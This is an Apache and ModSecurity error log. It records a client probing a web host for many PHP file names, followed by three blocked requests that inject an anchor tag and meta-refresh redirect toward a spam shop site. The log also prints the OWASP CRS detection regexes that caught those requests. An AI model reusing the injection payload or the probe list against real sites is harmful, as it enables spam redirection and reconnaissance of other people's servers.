[Mon May 11 19:40:47.900227 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/plugin-editor.php
[Mon May 11 19:40:48.058008 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/profile.php
[Mon May 11 19:40:48.215687 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/qw_03b4ad31.php
[Mon May 11 19:40:48.404770 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/radio.php
[Mon May 11 19:40:48.562427 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/sf.php
[Mon May 11 19:40:48.720037 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/simple.php
[Mon May 11 19:40:48.877781 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/sql.php
[Mon May 11 19:40:49.035590 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/test.php
[Mon May 11 19:40:49.211030 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/test1.php
[Mon May 11 19:40:49.368812 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/themes.php
[Mon May 11 19:40:49.693012 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/wp-admin.php
[Mon May 11 19:40:50.008192 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/wp-blog-header.php
[Mon May 11 19:40:50.166123 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/wp-config-sample.php
[Mon May 11 19:40:50.954955 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/wp.php
[Mon May 11 19:40:51.270504 2026] [:error] [pid 1501883:tid 1501888] [client 4.193.137.131:15490] File does not exist: /home/manhatta/public_html/xmlrpc.php
[Mon May 11 19:40:54.248361 2026] [ssl:error] [pid 1516058:tid 1516096] (EAI 2)Name or service not known: [client 116.202.235.23:19846] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:40:54.248397 2026] [ssl:error] [pid 1516058:tid 1516096] AH01941: stapling_renew_response: responder error
[Mon May 11 19:40:54.298334 2026] [ssl:error] [pid 1501831:tid 1501849] (EAI 2)Name or service not known: [client 116.202.235.23:19852] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:40:54.298361 2026] [ssl:error] [pid 1501831:tid 1501849] AH01941: stapling_renew_response: responder error
[Mon May 11 19:40:54.347726 2026] [ssl:error] [pid 1511173:tid 1511192] (EAI 2)Name or service not known: [client 116.202.235.23:19854] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:40:54.347754 2026] [ssl:error] [pid 1511173:tid 1511192] AH01941: stapling_renew_response: responder error
[Mon May 11 19:40:54.396727 2026] [ssl:error] [pid 1502013:tid 1502050] (EAI 2)Name or service not known: [client 116.202.235.23:19856] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:40:54.396758 2026] [ssl:error] [pid 1502013:tid 1502050] AH01941: stapling_renew_response: responder error
[Mon May 11 19:41:58.627629 2026] [security2:error] [pid 1501883:tid 1501887] [client 27.78.84.116:65265] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>high-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5jP5Q_-MBliRCAxOYQAAAAI"]
[Mon May 11 19:41:58.628810 2026] [security2:error] [pid 1501883:tid 1501887] [client 27.78.84.116:65265] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5jP5Q_-MBliRCAxOYQAAAAI"]
[Mon May 11 19:41:58.632232 2026] [security2:error] [pid 1501883:tid 1501887] [client 27.78.84.116:65265] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5jP5Q_-MBliRCAxOYQAAAAI"]
[Mon May 11 19:41:58.636608 2026] [security2:error] [pid 1501883:tid 1501887] [client 27.78.84.116:65265] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5jP5Q_-MBliRCAxOYQAAAAI"]
[Mon May 11 19:41:58.640204 2026] [security2:error] [pid 1501883:tid 1501887] [client 27.78.84.116:65265] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5jP5Q_-MBliRCAxOYQAAAAI"]
[Mon May 11 19:41:58.640646 2026] [security2:error] [pid 1501883:tid 1501887] [client 27.78.84.116:65265] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5jP5Q_-MBliRCAxOYQAAAAI"]
[Mon May 11 19:41:58.640918 2026] [security2:error] [pid 1501883:tid 1501887] [client 27.78.84.116:65265] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5jP5Q_-MBliRCAxOYQAAAAI"]
[Mon May 11 19:41:59.474070 2026] [security2:error] [pid 1516058:tid 1516108] [client 27.78.84.116:65383] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>high-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5yMeXtzav-mi9SyXJgAAANI"]
[Mon May 11 19:41:59.474487 2026] [security2:error] [pid 1516058:tid 1516108] [client 27.78.84.116:65383] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5yMeXtzav-mi9SyXJgAAANI"]
[Mon May 11 19:41:59.474656 2026] [security2:error] [pid 1516058:tid 1516108] [client 27.78.84.116:65383] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5yMeXtzav-mi9SyXJgAAANI"]
[Mon May 11 19:41:59.475040 2026] [security2:error] [pid 1516058:tid 1516108] [client 27.78.84.116:65383] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5yMeXtzav-mi9SyXJgAAANI"]
[Mon May 11 19:41:59.475266 2026] [security2:error] [pid 1516058:tid 1516108] [client 27.78.84.116:65383] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5yMeXtzav-mi9SyXJgAAANI"]
[Mon May 11 19:41:59.475684 2026] [security2:error] [pid 1516058:tid 1516108] [client 27.78.84.116:65383] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5yMeXtzav-mi9SyXJgAAANI"]
[Mon May 11 19:41:59.475966 2026] [security2:error] [pid 1516058:tid 1516108] [client 27.78.84.116:65383] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU5yMeXtzav-mi9SyXJgAAANI"]
[Mon May 11 19:42:00.285623 2026] [security2:error] [pid 1501883:tid 1501892] [client 27.78.84.116:65491] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>high-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6DP5Q_-MBliRCAxOYwAAAAc"]
[Mon May 11 19:42:00.286319 2026] [security2:error] [pid 1501883:tid 1501892] [client 27.78.84.116:65491] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6DP5Q_-MBliRCAxOYwAAAAc"]
[Mon May 11 19:42:00.286653 2026] [security2:error] [pid 1501883:tid 1501892] [client 27.78.84.116:65491] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [t [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6DP5Q_-MBliRCAxOYwAAAAc"]
[Mon May 11 19:42:00.287537 2026] [security2:error] [pid 1501883:tid 1501892] [client 27.78.84.116:65491] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTAC [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6DP5Q_-MBliRCAxOYwAAAAc"]
[Mon May 11 19:42:00.288324 2026] [security2:error] [pid 1501883:tid 1501892] [client 27.78.84.116:65491] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>High-class designer evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6DP5Q_-MBliRCAxOYwAAAAc"]
[Mon May 11 19:42:00.288763 2026] [security2:error] [pid 1501883:tid 1501892] [client 27.78.84.116:65491] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIU6DP5Q_-MBliRCAxOYwAAAAc"]
